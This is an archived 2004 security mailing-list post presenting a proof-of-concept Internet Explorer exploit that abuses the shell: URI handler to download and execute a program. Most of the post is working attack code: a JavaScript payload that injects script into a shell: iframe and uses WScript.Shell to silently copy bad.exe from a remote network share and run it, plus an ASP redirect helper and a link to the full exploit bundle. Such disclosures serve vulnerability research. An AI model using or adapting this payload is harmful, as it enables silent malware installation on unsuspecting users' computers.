[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200407131507.i6DF7Tu17791@netsys.com>
From: ferruh at mavituna.com (Ferruh Mavituna)
Subject: IE Shell URI Download and Execute, POC
Hello;
Code is based on http://www.securityfocus.com/archive/1/367878 (POC by
Jelmer) message. I just added a new feature "download" and then execute
application. Also I use Wscript.Shell in Javascript instead of
Shell.Application.
1- copy \\IPADDRESS\NULLSHAREDFOLDER\bad.exe (stealth)
2- Wait for download
3- Execute bad.exe (stealth)
New shellscript.js
=====================================================
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<s
cript language="JScript" DEFER> var
rF="\\\\\\\\IPADDRESS\\\\NULLSHAREDFOLDER\\\\bad.exe"; var
wF="%windir%\\\\_tmp.exe"; var o=new ActiveXObject("wscript.shell"); var
e="%comspec% /c copy "+rF+" "+wF; var
err=o.Run(e,0,true);if(err==0)o.Run(wF,0,false);</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
=====================================================
Also for testing in IIS Servers; ASP equivalent of redir.jsp
redir.asp
=====================================================
<%
Response.Expires = 1
Response.Expiresabsolute = Now() - 1
Response.AddHeader "pragma","no-cache"
Response.AddHeader "cache-control","private"
Response.CacheControl = "no-cache"
For x = 1 to 500000 'Time
z = z + 10
Next
Response.Status = "302 Found"
Response.AddHeader "Content-Length", "4"
Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm"
%>
=====================================================
Download All Files : http://ferruh.mavituna.com/exploits/fm_ieshell.zip
Online URL : http://ferruh.mavituna.com/article/?553
Ferruh.Mavituna
http://ferruh.mavituna.com
PGPKey : http://ferruh.mavituna.com/PGPKey.asc
Powered by blists - more mailing lists